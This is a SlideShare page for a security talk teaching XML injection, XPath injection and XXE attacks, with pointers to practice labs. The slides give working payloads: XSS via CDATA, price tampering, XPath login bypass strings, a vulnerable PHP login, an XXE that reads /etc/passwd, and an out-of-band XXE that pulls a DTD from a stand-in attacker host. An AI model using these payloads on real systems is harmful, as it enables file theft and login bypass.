SlideShare a Scribd company logo

Hands-On XML Attacks

Download as ODP, PDF
Toe Khaing
Toe Khaing

XML Vulnerabilities; XML Injection, XPath Injection, XXE Attacks with demo lab

Technology
1 of 28
Hands-on XML Attacks Presented by Toe Khaing Oo
About Me ➢ Student at UCSY ➢ Programmer ➢ Security Enthusiast ➢ Contributor at OWASP Myanmar ➢ Organizer at Myanmar Cyber Conference
● Extensible Markup Language (XML) ● Textual Data Format ● Focus on Documents ● Use to annotate text or add additional information ● Relies on Document Type Definition (DTD) What is XML?
XML Structure ● XML Header (Document Type Definition – DTD) <?xml version=”1.0” encoding=”ISO-8859-1"?> ● Elements <item> <itemId> 1 </itemId> <itemName> Book </itemName> </item>
Types of XML vulnerabilities  XML Injection (TAG Injection)  XPath Injection  XML External Entities (XXE)
XML Injection ● Try to inject XML doc to application and XML parser fails to validate data ● Try to insert XML characters, tags, methods, etc.. ● Possible to inject XML data & tags to xml database ● Possible to test with Single Quote ‘ when not sanitized Example; <username attrib=’$usernameInput’ /> when single quote add it became … <username attrib=’admin’’ />
Detection for XML Injection ’ Single Quote ” Double Quote
Testing for XML Injection ● Different Attack Surface; Input Fields like User Registration, Update Information and so on. ● Both GET and POST ● Use Escape Characters to invalidate XML document
Exploitation for XML Injection ● New value of existing tag from elements <username> Toe </username> ● Using Comment tag <!-- Tag --> <!-- username --> <username>Toe</username> ● CDATA section delimiters <username> <! [CDATA[<$userName]]></username> <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
Example Code <book> <id> 102 </id> <bookName> Sherlock </bookName> <price> 200 </price> </book> When user buys book from store, the url may be http://shop.com/buy.php?bookID=102&bookName=Sherlock&price=200 When attacker inject the existing price tag with new value http://shop.com/buy.php?bookID=102&bookName=Sherlock&<price>0</price> <book> <id> 102 </id> <bookName> Sherlock </bookName> <price> 0 </price> <price> 200 </price> </book>
XML Injection Cheat Sheets https://github.com/toekhaing/xml_attacks/blob/master/xml_injection.txt
Xpath Injection ● Xpath refers to XML Path Language ● Xpath Injection is similar to SQL injection. ● Another Type of XML Injection ● Less Awareness ● Occurs in Xpath Query for XML data when input data are not sanitized to verify ● Possible to get entire document
Detection for XPath Injection ● ‘ Single Quote ● “ Double Quote ● ‘ or ‘a’=’a ● ‘ and ‘a’=’b ● OR 1=1 ● AND 1=2
Exploitation for XPath Injection Common Xpath Payloads 'or '1'='1 'or 1=1 or '=' ]|*|user[@role='admin "NODENAME" (Return all children of node) "//NODENAME" (Return all elements in the document) "NODeNAME//SUBNODENAME" (return all SUBNODE under NODE element) "//NODENAME/[NAME="VALUE" (value = admin)
Blind XPath Injection ● count(//user/child::node() - Return the number of nodes ● Find the error with injecting the following code ‘ or count (parent::*[position()=1])=0 or ‘a’=’b ‘ or count (parent::*[position()=1])>0 or ‘a’=’b 1 or count (parent::*[position()=1])=0 1 or count (parent::*[position()=1])>0
Example Attack & Resources ● Login Bypass http://site.com/login.php?username=admin’ or 1=1 or ‘’=’ ● Tools Xcat (https://github.com/orf/xcat) ● Cheat Sheets https://github.com/toekhaing/xml_attacks/blob/master/xpath _Injection.txt
XML External Entities (XXE) ● Type of Injection Attack to an application that parses XML input. ● Caused by misconfigured XML Parser. ● Leads to Extracting Sensitive Data ● Remote Code Execution (RCE) in some cases
Common XXE Vulnerabilities ● Apache POI ● CVE-2014-3574 ● CVE-2014-3529 ● DOCX4J ● OpenXML SDK ● NOKOGIRI ● CVE-2012-6685 ● CVE-2014-3660 ● Play Framework XXE
Finding XXE Flaws ● Wide Attack Surface ● Register Page, login page, file upload and etc. ● Checking [Content-Type].xml
Detection for XXE Vulnerability ● Read local files on web server by using SYSTEM entity <!ENTITY xxe SYSTEM “file:///etc/passwd “ > ● Process Document Type Declaration (DTD) to remote <!ENTITY xxe SYSTEM "http://IP:PORT/test.dtd"> ● File Upload (OOXML) Upload file xml, docx, xlsx with embedded xxe payload.
Example Attack PHP Code <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_import_dom($dom); $user = $login->user; $pass = $login->pass; echo "You have logged in as user $user"; ?> Request <login> <user>Toe</user> <pass>mypass</pass> </login>
Exploitation Simple XXE Payload that extract local file /etc/passwd <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <login> <user>&xxe;</user> <pass>mypass</pass> </login>
Proof of Concept $curl -d payload.txt http://site.com/login.php
Exploiting File upload XXE (OOXML) ● Insert XML codes to docx(whatever) files ● Payload <!DOCTYPE xxe [ <!ENTITY % get SYSTEM "file:///etc/passwd"> <!ENTITY % dtd SYSTEM "http://YOURIP:8080/payload.dtd" > %get %dtd;]> ● Tool https://github.com/BuffaloWill/oxml_xxe
Demonstration XXE Attack demonstration with XXE Lab https://github.com/jbarone/xxelab
Case Study Pentester Lab : Play XML Entities https://www.vulnhub.com/entry/pentester-lab-play-xml-entities,119 Notes & Collections of XML Attacks https://github.com/toekhaing/xml_attacks
EOF Thanks for your attention

Recommended

XXE - XML External Entity Attack
XXE - XML External Entity Attack XXE - XML External Entity Attack
XXE - XML External Entity Attack Cysinfo Cyber Security Community
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)Jay Thakker
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overviewSolidQ
 
Hacking Cisco Networks and Countermeasures
Hacking Cisco Networks and CountermeasuresHacking Cisco Networks and Countermeasures
Hacking Cisco Networks and Countermeasuresdkaya
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 

Recommended

XXE - XML External Entity Attack
XXE - XML External Entity Attack XXE - XML External Entity Attack
XXE - XML External Entity Attack Cysinfo Cyber Security Community
 
XML External Entity (XXE)
XML External Entity (XXE)XML External Entity (XXE)
XML External Entity (XXE)Jay Thakker
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege EscalationRiyaz Walikar
 
Always encrypted overview
Always encrypted overviewAlways encrypted overview
Always encrypted overviewSolidQ
 
Hacking Cisco Networks and Countermeasures
Hacking Cisco Networks and CountermeasuresHacking Cisco Networks and Countermeasures
Hacking Cisco Networks and Countermeasuresdkaya
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Sqlmap
SqlmapSqlmap
SqlmapInstitute of Information Security (IIS)
 
XXE
XXEXXE
XXEn|u - The Open Security Community
 
Jwt Security
Jwt SecurityJwt Security
Jwt SecuritySeid Yassin
 
Email security
Email securityEmail security
Email securitySultanErbo
 
SAX
SAXSAX
SAXTilakpoudel2
 
DMARC Overview
DMARC OverviewDMARC Overview
DMARC OverviewOWASP Delhi
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for youToby Kohlenberg
 
Banner grabbing
Banner grabbingBanner grabbing
Banner grabbingarizonainfotech
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
03 namespace
03 namespace03 namespace
03 namespaceBaskarkncet
 
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptxBSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptxJasonOstrom1
 
Network scanning
Network scanningNetwork scanning
Network scanningMD SAQUIB KHAN
 
fundamentals of XML
fundamentals of XMLfundamentals of XML
fundamentals of XMLhamsa nandhini
 
Sql Server 2016 Always Encrypted
Sql Server 2016 Always EncryptedSql Server 2016 Always Encrypted
Sql Server 2016 Always EncryptedDuncan Greaves PhD
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys AdminsWill Schroeder
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
Secure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encodingSecure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encodingSecure Code Warrior
 

More Related Content

What's hot

01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Email security
Email securityEmail security
Email securitySultanErbo
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for youToby Kohlenberg
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptxBSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptxJasonOstrom1
 
Sql Server 2016 Always Encrypted
Sql Server 2016 Always EncryptedSql Server 2016 Always Encrypted
Sql Server 2016 Always EncryptedDuncan Greaves PhD
 

What's hot (20)

01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
XXE
XXEXXE
XXE
 
Jwt Security
Jwt SecurityJwt Security
Jwt Security
 
Email security
Email securityEmail security
Email security
 
SAX
SAXSAX
SAX
 
DMARC Overview
DMARC OverviewDMARC Overview
DMARC Overview
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Red teaming probably isn't for you
Red teaming probably isn't for youRed teaming probably isn't for you
Red teaming probably isn't for you
 
Banner grabbing
Banner grabbingBanner grabbing
Banner grabbing
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
03 namespace
03 namespace03 namespace
03 namespace
 
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptxBSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
BSidesDFW2022-PurpleTeam_Cloud_Identity.pptx
 
Network scanning
Network scanningNetwork scanning
Network scanning
 
fundamentals of XML
fundamentals of XMLfundamentals of XML
fundamentals of XML
 
Sql Server 2016 Always Encrypted
Sql Server 2016 Always EncryptedSql Server 2016 Always Encrypted
Sql Server 2016 Always Encrypted
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 

Similar to Hands-On XML Attacks

Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
Secure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encodingSecure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encodingSecure Code Warrior
 
Arm yourself with Domain Driven Security. It's time to slay some security trolls
Arm yourself with Domain Driven Security. It's time to slay some security trollsArm yourself with Domain Driven Security. It's time to slay some security trolls
Arm yourself with Domain Driven Security. It's time to slay some security trollsOmegapoint Academy
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 securityHuang Toby
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
XML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxXML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxSamitAnwer2
 
Understanding Web Applications and Web Testing Tools - QAConf
Understanding Web Applications and Web Testing Tools - QAConfUnderstanding Web Applications and Web Testing Tools - QAConf
Understanding Web Applications and Web Testing Tools - QAConfnarayanraman
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007Aung Khant
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
SharePoint Cincy 2012 - jQuery essentials
SharePoint Cincy 2012 - jQuery essentialsSharePoint Cincy 2012 - jQuery essentials
SharePoint Cincy 2012 - jQuery essentialsMark Rackley
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...Doris Chen
 

Similar to Hands-On XML Attacks (20)

Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients
 
Secure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encodingSecure Code Warrior - Insufficient data encoding
Secure Code Warrior - Insufficient data encoding
 
Jquery fundamentals
Jquery fundamentalsJquery fundamentals
Jquery fundamentals
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Arm yourself with Domain Driven Security. It's time to slay some security trolls
Arm yourself with Domain Driven Security. It's time to slay some security trollsArm yourself with Domain Driven Security. It's time to slay some security trolls
Arm yourself with Domain Driven Security. It's time to slay some security trolls
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 security
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
XML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptxXML External Entity Null Meet 19_3_16.pptx
XML External Entity Null Meet 19_3_16.pptx
 
Understanding Web Applications and Web Testing Tools - QAConf
Understanding Web Applications and Web Testing Tools - QAConfUnderstanding Web Applications and Web Testing Tools - QAConf
Understanding Web Applications and Web Testing Tools - QAConf
 
Jquery Basics
Jquery BasicsJquery Basics
Jquery Basics
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
jQuery
jQueryjQuery
jQuery
 
SharePoint Cincy 2012 - jQuery essentials
SharePoint Cincy 2012 - jQuery essentialsSharePoint Cincy 2012 - jQuery essentials
SharePoint Cincy 2012 - jQuery essentials
 
前端概述
前端概述前端概述
前端概述
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...
Develop High Performance Windows 8 Application with HTML5 and JavaScriptHigh ...
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security Hardening
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security Hardening
 

Recently uploaded

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 

Recently uploaded (20)

Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 

Hands-On XML Attacks

  • 2. About Me ➢ Student at UCSY ➢ Programmer ➢ Security Enthusiast ➢ Contributor at OWASP Myanmar ➢ Organizer at Myanmar Cyber Conference
  • 3. ● Extensible Markup Language (XML) ● Textual Data Format ● Focus on Documents ● Use to annotate text or add additional information ● Relies on Document Type Definition (DTD) What is XML?
  • 4. XML Structure ● XML Header (Document Type Definition – DTD) <?xml version=”1.0” encoding=”ISO-8859-1"?> ● Elements <item> <itemId> 1 </itemId> <itemName> Book </itemName> </item>
  • 5.
  • 6. Types of XML vulnerabilities  XML Injection (TAG Injection)  XPath Injection  XML External Entities (XXE)
  • 7. XML Injection ● Try to inject XML doc to application and XML parser fails to validate data ● Try to insert XML characters, tags, methods, etc.. ● Possible to inject XML data & tags to xml database ● Possible to test with Single Quote ‘ when not sanitized Example; <username attrib=’$usernameInput’ /> when single quote add it became … <username attrib=’admin’’ />
  • 8. Detection for XML Injection ’ Single Quote ” Double Quote
  • 9. Testing for XML Injection ● Different Attack Surface; Input Fields like User Registration, Update Information and so on. ● Both GET and POST ● Use Escape Characters to invalidate XML document
  • 10. Exploitation for XML Injection ● New value of existing tag from elements <username> Toe </username> ● Using Comment tag <!-- Tag --> <!-- username --> <username>Toe</username> ● CDATA section delimiters <username> <! [CDATA[<$userName]]></username> <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
  • 11. Example Code <book> <id> 102 </id> <bookName> Sherlock </bookName> <price> 200 </price> </book> When user buys book from store, the url may be http://shop.com/buy.php?bookID=102&bookName=Sherlock&price=200 When attacker inject the existing price tag with new value http://shop.com/buy.php?bookID=102&bookName=Sherlock&<price>0</price> <book> <id> 102 </id> <bookName> Sherlock </bookName> <price> 0 </price> <price> 200 </price> </book>
  • 12. XML Injection Cheat Sheets https://github.com/toekhaing/xml_attacks/blob/master/xml_injection.txt
  • 13. Xpath Injection ● Xpath refers to XML Path Language ● Xpath Injection is similar to SQL injection. ● Another Type of XML Injection ● Less Awareness ● Occurs in Xpath Query for XML data when input data are not sanitized to verify ● Possible to get entire document
  • 14. Detection for XPath Injection ● ‘ Single Quote ● “ Double Quote ● ‘ or ‘a’=’a ● ‘ and ‘a’=’b ● OR 1=1 ● AND 1=2
  • 15. Exploitation for XPath Injection Common Xpath Payloads 'or '1'='1 'or 1=1 or '=' ]|*|user[@role='admin "NODENAME" (Return all children of node) "//NODENAME" (Return all elements in the document) "NODeNAME//SUBNODENAME" (return all SUBNODE under NODE element) "//NODENAME/[NAME="VALUE" (value = admin)
